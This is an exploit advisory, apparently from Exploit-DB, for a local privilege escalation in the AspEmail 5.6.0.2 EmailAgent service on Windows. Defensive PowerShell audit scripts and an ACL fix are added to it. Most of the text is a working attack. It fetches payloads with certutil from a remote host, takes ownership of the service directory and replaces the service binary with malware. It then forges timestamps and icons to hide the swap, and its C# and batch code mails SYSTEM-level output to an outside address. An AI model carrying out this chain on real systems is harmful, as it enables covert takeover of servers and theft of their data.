AspEmail v5.6.0.2 – Local Privilege Escalation

  • Author: Zer0FauLT
    Date: 2023-04-20
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51380/
    ####################################################################################################################
    # Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation
    # Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability]
    # Date: 13/04/2023
    # Exploit Author: Zer0FauLT [admindeepsec@proton.me]
    # Vendor Homepage: https://www.aspemail.com
    # Software Link: https://www.aspemail.com/download.html
    # Product: AspEmail
    # Version: AspEmail 5.6.0.2 and all
    # Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU
    # Tested on: Windows Server 2016 and Windows Server 2019
    # CVE : 0DAY
    ####################################################################################################################
    
    # ==================================================================================================================
    
    [+] C:\PenTest>whoami /priv

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                               State
    ============================= ========================================= ========
    SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
    SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
    SeImpersonatePrivilege        Impersonate a client after authentication Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
     
    # ==================================================================================================================
    
    * First, we test whether the AspEmail service is active.
    * With normal user rights we list the processes running on the system and check whether the process of the relevant service is present:
    
    [+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
    EmailAgent.exe                4400 Persits Software EmailAgent

    or

    [+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
    EmailAgent64.exe              4400 Persits Software EmailAgent
     
    * We have found that the process of the "Persits Software EmailAgent" service is in the "RUNNING" state.
    * So we know that the AspEmail service is active.
    
    # ==================================================================================================================
    
    * We will need these:
    
    [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
    [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
    [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
    [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
    [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
    
    # ==================================================================================================================
    
    [+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
    
     Name              : Persits Software EmailAgent
     ImagePath         : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
     User              : LocalSystem
     ModifiablePath    : C:\Program Files (x86)\Persits Software\AspEmail\BIN
     IdentityReference : Everyone
     Permissions       : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
                         AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
                         ReadExtendedAttributes, DeleteChild, Execute/Traverse
     Status            : Unknown
     UserCanStart      : False
     UserCanStop       : False
     
    [+] C:\PenTest>del PrivescCheck.ps1
    
    * Our checks detected a "Binary Permission Vulnerability" in the "Persits Software EmailAgent" service: the directory holding its binary is modifiable by Everyone, while the service itself runs as LocalSystem.

    # ==================================================================================================================
    
    [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
    
    Successfully processed 0 files; Failed processing 1 files
    C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
    
    * We do not have permission to access the AspEmail directory itself (not even to read its ACL).
    
    # ==================================================================================================================
    
    [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
    
     C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
    DeepSecLab\psacln:(I)(OI)(CI)(N)
    DeepSecLab\psaadm:(I)(OI)(CI)(N)
    DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
    BUILTIN\Administrators:(I)(F)
    CREATOR OWNER:(I)(OI)(CI)(IO)(F)
    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
    NT SERVICE\TrustedInstaller:(I)(CI)(F)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
    BUILTIN\Users:(I)(OI)(CI)(RX)
    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
    							
    * Unlike the other directories, we have full privileges in the service's "BIN" directory: Everyone is granted (OI)(CI)(F), i.e. full control that is inherited by every file and subdirectory.
    * In Linux terms this is chmod 0777 (rwxrwxrwx).
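    * Added example (not from the original advisory): the icacls check above covers a single directory. The PowerShell below, written here as a defender's audit, enumerates every installed service, takes the directory its binary lives in and reports any ACE that grants write-type rights to broad principals such as Everyone or BUILTIN\Users. The principal list and the set of rights counted as "write" are assumptions of this example. Run it as a low-privileged user to see what that user could replace, and run it again after the icacls /RESET in the [FIX] section to confirm the directory no longer shows up.

```powershell
# Added audit script (not part of the advisory). Lists services whose binary
# directory grants write-type rights to broad principals.

# Assumption: these principals count as "any local user".
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a user add, replace or delete files in the directory, or rewrite its ACL.
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                   [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::DeleteSubdirectoriesAndFiles -bor
                   [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership)
# Inherited ACEs sometimes carry raw generic bits instead of named rights.
$GenericWriteBits = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName looks like  "C:\dir\svc.exe" /run   or   C:\dir\svc.exe -arg
    if ($PathName -match '^\s*"([^"]+)"')   { return $Matches[1] }
    if ($PathName -match '^\s*(\S+?\.exe)') { return $Matches[1] }
    # Unquoted path with spaces: only the part before the first space is recoverable here.
    return ($PathName.Trim() -split ' ')[0]
}

function Find-WritableServiceDirectory {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $dir = Split-Path -Path (Get-ServiceBinaryPath $svc.PathName) -Parent
        if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { continue }
        try { $acl = Get-Acl -LiteralPath $dir } catch { continue }   # access denied: nothing to report
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            $raw = [int]$ace.FileSystemRights
            if (($raw -band $WriteMask) -eq 0 -and ($raw -band $GenericWriteBits) -eq 0) { continue }
            # Inherit-only entries are reported too: they propagate to the binary itself.
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Directory = $dir
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

Find-WritableServiceDirectory | Format-Table -AutoSize
```

    * On the host in this advisory the script would list "Persits Software EmailAgent" running as LocalSystem with Everyone holding FullControl on the BIN directory; an unquoted service path containing spaces is a separate weakness and is not handled here.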
    							
    # ==================================================================================================================
    													 
    [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
    
     __PATH

     \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"

     \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
       AccountName          = Administrators
       ReferencedDomainName = BUILTIN
       SID                  = S-1-5-32-544
       SidLength            = 16
       BinaryRepresentation = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}

     [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
    
    * This tells us that "EmailAgent.exe" was installed by an administrator and that its owner is BUILTIN\Administrators.
    
    # ==================================================================================================================
    
    * Now we take ownership of the "BIN" directory, since that is where we will carry out our operations.
    
    [+] C:\PenTest>whoami
    DeepSecLab\Hacker
    
    [+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
    SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
    
    [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
    
    processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
    Successfully processed 1 files; Failed processing 0 files
    
    * OK. All commands completed successfully. We now have full privileges over this directory.
    
    # ==================================================================================================================
    
    * Now we replace the EmailAgent binary with self-written malware.
    * We are careful not to damage any files while doing this, so that all changes can easily be undone.
    
    [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
    [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
    
    # ==================================================================================================================
    
    [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
     Volume in drive C has no label.
     Volume Serial Number is 0C8A-5291

     Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

    14.04.2023  16:47    <DIR>          .
    14.04.2023  16:47    <DIR>          ..
    01.03.2004  15:55           143.360 AspEmail.dll
    25.02.2004  16:23           188.416 AspUpload.dll
    13.04.2023  22:00            12.288 EmailAgent.exe       <<<=== renamed from EmailAgentPrivESC.exe
    24.09.2003  09:22           139.264 EmailAgentCfg.cpl
    24.09.2003  09:25            94.208 EmailLogger.dll
    24.09.2003  09:21           167.936 Null.EmailAgent.exe
                   6 File(s)        745.472 bytes
                   2 Dir(s)  165.936.717.824 bytes free
    			 
    # ==================================================================================================================
    
    * Now we set the file's Last Modified, Creation and Last Accessed dates.
    
    [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
    [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
    
    * Next we extract the icon from the real EmailAgent.exe and apply it to the exploit binary. This makes the replacement harder to spot.
    * I used the Resource Tuner Console tool. 
    >>> http://www.restuner.com/tour-resource-tuner-console.htm
    * This can be done easily with the Resource Tuner tool.
    >>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
    >>> http://www.restuner.com/download.htm
    
    # ==================================================================================================================
    
    [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
     Volume in drive C has no label.
     Volume Serial Number is 0C8A-5291

     Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

    14.04.2023  16:47    <DIR>          .
    14.04.2023  16:47    <DIR>          ..
    01.03.2004  15:55           143.360 AspEmail.dll
    25.02.2004  16:23           188.416 AspUpload.dll
    24.09.2003  09:21            12.288 EmailAgent.exe
    24.09.2003  09:22           139.264 EmailAgentCfg.cpl
    24.09.2003  09:25            94.208 EmailLogger.dll
    24.09.2003  09:21           167.936 Null.EmailAgent.exe
                   6 File(s)        745.472 bytes
                   2 Dir(s)  165.936.717.824 bytes free

    [24.09.2003 09:21]   12.288 EmailAgent.exe
    [24.09.2003 09:21]  167.936 Null.EmailAgent.exe
    
    * The timestamp manipulation is complete. Both files now look as if they were written at the same time, long ago.
    
    # ==================================================================================================================
    
    * Now we check the ownership of our malware.
    
    [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
    
    __PATH

    \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"

    \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"
      AccountName          = Hacker
      ReferencedDomainName = DeepSecLab
      SID                  = S-1-5-21-3674093405-176013069-2091862131-1511
      SidLength            = 28
      BinaryRepresentation = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0}

    [+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name

    Name

    DeepSecLab\Hacker

     EmailAgent.exe Owner: DeepSecLab\Hacker
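    * Added example (not from the original advisory): the owner query above is done with WMIC for one file. The PowerShell below, written here as a defender's check, does the same for every service binary and adds the Authenticode status and file timestamps. The list of owners treated as trusted is an assumption of this example. The timestamps can be forged, as the setfiletime step above shows, so a binary owned by an ordinary user account, or one that is unsigned while the vendor's other files are signed, is the stronger signal.

```powershell
# Added integrity check (not part of the advisory). Reports owner, Authenticode
# status and timestamps of every service binary so that a replaced one stands out.

# Assumption: a service binary should be owned by one of these accounts.
$TrustedOwners = @(
    'BUILTIN\Administrators',
    'NT AUTHORITY\SYSTEM',
    'NT SERVICE\TrustedInstaller'
)

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName looks like  "C:\dir\svc.exe" /run   or   C:\dir\svc.exe -arg
    if ($PathName -match '^\s*"([^"]+)"')   { return $Matches[1] }
    if ($PathName -match '^\s*(\S+?\.exe)') { return $Matches[1] }
    return ($PathName.Trim() -split ' ')[0]
}

function Get-ServiceBinaryInfo {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
        # Owner of the file object, the same value WMIC's Win32_LogicalFileOwner association returns.
        try   { $owner = (Get-Acl -LiteralPath $exe).Owner }
        catch { $owner = '<access denied>' }
        $sig  = Get-AuthenticodeSignature -LiteralPath $exe
        $item = Get-Item -LiteralPath $exe
        $signer = $null
        if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
        [pscustomobject]@{
            Service      = $svc.Name
            RunsAs       = $svc.StartName
            Path         = $exe
            Owner        = $owner
            OwnerTrusted = ($TrustedOwners -contains $owner)
            Signature    = $sig.Status          # Valid, NotSigned, HashMismatch, ...
            Signer       = $signer
            Created      = $item.CreationTimeUtc
            Modified     = $item.LastWriteTimeUtc
        }
    }
}

# Show only the suspicious entries; drop the Where-Object to keep the full inventory as a baseline.
Get-ServiceBinaryInfo |
    Where-Object { -not $_.OwnerTrusted -or $_.Signature -ne 'Valid' } |
    Format-Table Service, RunsAs, Owner, Signature, Modified, Path -AutoSize
```

    * On the host in this advisory the replaced EmailAgent.exe would be reported with Owner DeepSecLab\Hacker, and a home-built .NET console application would normally show Signature NotSigned, regardless of what its timestamps say.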
    
    # ==================================================================================================================

    ####################################################################################################################
    # [EmailAgent.cs]
    ####################################################################################################################

    * We program this malware in such a way that when the server is rebooted (i.e. when the services are restarted),
    * it is triggered and executes the commands we want,
    * and then sends a printout of all this to the email address we specified.

     using System;
     using System.Linq;
     using System.Text;
     using System.Diagnostics;
     using System.IO;
     using System.Collections;

     // The Cli helper class (FileToCli / Execute / ToFile) is not included in the advisory.
     namespace CliToolSpace
     {
         class _Main
         {
             static void Main(string[] args)
             {
                 Cli commandLine = new Cli();
                 // Runs the mailer and the batch file, then writes the captured output under C:\Windows\Temp\
                 commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat");
                 commandLine.Execute();
                 commandLine.ToFile(@"C:\Windows\Temp\");
             }
         }
     }

    ####################################################################################################################
    # [Mail.cs]
    ####################################################################################################################

     // Top-level statements: sends the captured output as a mail attachment once the payload has run.
     using System;
     using System.Net.Mail;
     using System.Net;

     SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");
     var mail = new MailMessage();
     mail.From = new MailAddress("mail@deepseclab.com");
     mail.To.Add("mail@hacker.com");
     mail.Subject = "Trigger Successful!";
     mail.IsBodyHtml = true;
     string htmlBody;
     htmlBody = "<strong>This server has been rebooted.</strong>";
     mail.Body = htmlBody;
     Attachment attachment;
     attachment = new Attachment(@"C:\Windows\Temp\Export.txt");   // written by Run.bat
     mail.Attachments.Add(attachment);
     SmtpServer.Port = 587;
     SmtpServer.UseDefaultCredentials = false;
     SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com", "p@ssw0rd123");
     SmtpServer.EnableSsl = true;
     SmtpServer.Timeout = int.MaxValue;
     SmtpServer.Send(mail);

    ####################################################################################################################
    # [Run.bat]
    ####################################################################################################################

    whoami > C:\Windows\Temp\Export.txt
    cd "C:\Program Files (x86)\Persits Software\AspEmail\Bin"
    del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe
    rem Mail.exe and Run.bat were dropped into C:\Windows\Temp above
    cd C:\Windows\Temp
    del Run.bat & del Mail.exe

    ####################################################################################################################

     [+] Trigger Successful! [+]

    [+] C:\PenTest>systeminfo | findstr "Boot Time"
    System Boot Time:          13.04.2022, 07:46:06

    ####################################################################################################################
    # [Export.txt]
    ####################################################################################################################

    NT AUTHORITY\SYSTEM

    ####################################################################################################################

    # ==================================================================================================================
    # ...|||[FIX]|||...
    # ==================================================================================================================
    [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD
    # ==================================================================================================================
    
    [+] C:\Administrator>sc qc "Persits Software EmailAgent"
    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: Persits Software EmailAgent
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Persits Software EmailAgent
            DEPENDENCIES       : rpcss
            SERVICE_START_NAME : LocalSystem
    
    # ==================================================================================================================
    
    [+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
    
    D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
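    * Added example (not from the original advisory): the SDDL string returned by sc sdshow is hard to read by eye. The PowerShell below, written here as a defender's helper, parses it with the .NET RawSecurityDescriptor class and maps each access mask to the service access-right names from the Win32 service API; the set of rights treated as dangerous is an assumption of this example. Decoding the string above shows that only BUILTIN\Administrators holds CHANGE_CONFIG, DELETE, WRITE_DAC and WRITE_OWNER on the service object, which is why the escalation had to go through the file-system ACL of the BIN directory rather than through the service configuration.

```powershell
# Added decoder (not part of the advisory) for a service DACL in SDDL form.
# Bit values are the SERVICE_* and standard-rights constants from the Win32 service API.
$ServiceRights = [ordered]@{
    QUERY_CONFIG         = 0x00001
    CHANGE_CONFIG        = 0x00002
    QUERY_STATUS         = 0x00004
    ENUMERATE_DEPENDENTS = 0x00008
    START                = 0x00010
    STOP                 = 0x00020
    PAUSE_CONTINUE       = 0x00040
    INTERROGATE          = 0x00080
    USER_DEFINED_CONTROL = 0x00100
    DELETE               = 0x10000
    READ_CONTROL         = 0x20000
    WRITE_DAC            = 0x40000
    WRITE_OWNER          = 0x80000
}
# Assumption: rights that let a principal take over the service (rebind its binary or account, rewrite its ACL).
$DangerousRights = @('CHANGE_CONFIG', 'DELETE', 'WRITE_DAC', 'WRITE_OWNER')

function ConvertFrom-ServiceSddl {
    param([Parameter(Mandatory)][string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Translate the numeric access mask into right names.
        $names = @(foreach ($kv in $ServiceRights.GetEnumerator()) {
            if (($ace.AccessMask -band $kv.Value) -ne 0) { $kv.Key }
        })
        # Resolve the SID to an account name where the machine can; otherwise keep the raw SID.
        try   { $account = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $account = $ace.SecurityIdentifier.Value }
        $hijack = @($names | Where-Object { $DangerousRights -contains $_ })
        [pscustomobject]@{
            Type      = $ace.AceType            # AccessAllowed / AccessDenied
            Principal = $account
            Rights    = ($names -join ',')
            Dangerous = ($ace.AceType -eq 'AccessAllowed' -and $hijack.Count -gt 0)
        }
    }
}

# Sample input: the DACL printed by "sc sdshow" earlier in this advisory.
$SampleSddl = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
ConvertFrom-ServiceSddl -Sddl $SampleSddl | Format-Table -AutoSize

# Live use against an installed service:
#   ConvertFrom-ServiceSddl -Sddl ((sc.exe sdshow 'Persits Software EmailAgent') -match '^D:')[0]
```

    * For the sample string the SY entry decodes to QUERY_CONFIG,QUERY_STATUS,ENUMERATE_DEPENDENTS,START,STOP,PAUSE_CONTINUE,INTERROGATE,USER_DEFINED_CONTROL,READ_CONTROL (Dangerous = False), the BA entry additionally carries CHANGE_CONFIG, DELETE, WRITE_DAC and WRITE_OWNER (Dangerous = True), and the IU and SU entries are read-only.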
    
    # ==================================================================================================================
    
    [+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula
    
    Accesschk v6.15 - Reports effective permissions for securable objects
    Copyright (C) 2006-2022 Mark Russinovich
    Sysinternals - www.sysinternals.com
    
    Persits Software EmailAgent
    Medium Mandatory Level (Default) [No-Write-Up]
    RW NT AUTHORITY\SYSTEM
    SERVICE_ALL_ACCESS
    RW BUILTIN\Administrators
    SERVICE_ALL_ACCESS
    		
    # ==================================================================================================================
    
    [+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET
    
    [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
    
    Successfully processed 0 files; Failed processing 1 files
    C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
    
    DONE!
    
    # ==================================================================================================================
    
    [+] C:\Administrator>sc stop "Persits Software EmailAgent"
    
    [+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
    
    * These commands are optional; they stop and restart the "Persits Software EmailAgent" service. Since we have fixed the vulnerability, I don't think this is necessary any more.
    
    # ==================================================================================================================